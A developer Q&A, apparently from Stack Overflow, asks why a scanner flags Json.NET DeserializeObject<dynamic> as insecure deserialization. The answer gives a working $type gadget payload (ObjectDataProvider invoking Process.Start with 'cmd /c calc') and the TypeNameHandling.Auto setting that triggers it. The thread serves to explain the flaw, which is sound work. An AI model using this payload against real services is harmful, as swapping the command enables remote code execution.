# Insecure deserialization using Json.NET

Tags: c#, security, json.net

A static security scanner has flagged my C# code on this line:

```
var result = JsonConvert.DeserializeObject<dynamic>(response);
```

`response` will contain a JSON response from a web API.

The scanner has flagged this as "insecure deserialization".

Can someone help me understand how this can be exploited? Web examples are not really clear on whether the exploit can happen within the `DeserializeObject` method itself or if only after the deserialization.

Comment: Have you considered the <dynamic> part

Comment: Which scanner is it? I can only presume that it's unhappy with the response being deserialised to a dynamic object, which means you would deserialise _anything_ that you are sent. I'm pretty sure that wouldn't produce anything executable though

Comment: As far as I know, the vulnerability exist only in non-generic version of DeserializeObject method (but maybe also in dynamic type). Check [here](https://youtu.be/oUAeWhW5b8c?t=471) for more details.

Comment: Although such analyzers can provide useful analysis, I've seen situations where the exact reason for the flag isn't clearly specified. If a person rejected it they would explain why more clearly, but the scanner's "thinking" can be opaque, which means the robot overlord doesn't tell us why it's unhappy.

Comment: No idea if this is the answer but OWASP recomend that you set TypeNameHandling to None https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Deserialization_Cheat_Sheet.md

Comment: Possible duplicate of [TypeNameHandling caution in Newtonsoft Json](https://stackoverflow.com/questions/39565954/typenamehandling-caution-in-newtonsoft-json)

Comment: Also possibly related: [Is it possible to set Json.Net to ignore $type?](https://stackoverflow.com/q/48159442/3744182) for which the answer is, *yes - that's the default*.

Comment: What happens if you replace that with `var result = JToken.Parse(response);`?  The return is the same either way.

Answer (score 24):

Try to deserialize this json:

```json
{
    "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "MethodParameters": {
        "$type": "System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "$values": [ "cmd", "/c calc" ]
    },
    "ObjectInstance": { "$type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" }
}
```

with this code

```
dynamic obj = JsonConvert.DeserializeObject<dynamic>(json, new JsonSerializerSettings
{
    TypeNameHandling = TypeNameHandling.Auto
});
```

It will open the Windows calculator application. The same way any executable or script could be run. The problem persists also if you use `object` instead of `dynamic` or the non generic `DeserializeObject` method. Be aware that if you don't set `TypeNameHandling = TypeNameHandling.Auto` someone else could set the global settings like this:

```
JsonConvert.DefaultSettings = () => 
    new JsonSerializerSettings{TypeNameHandling = TypeNameHandling.Auto};
```

Comment: That's a great explanation! While I get that it will be vulnerable if TrustedType is set to object or dynamic. Will it be vulnerable if "JObject" is used as TrustedType as seen in this line:  JsonConvert.DeserializeObject<JObject>(jsonString) ?